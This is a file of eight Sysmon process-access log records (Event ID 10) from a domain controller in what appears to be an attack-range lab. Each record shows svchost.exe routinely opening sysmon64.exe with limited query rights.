{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5045,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5046,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5047,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
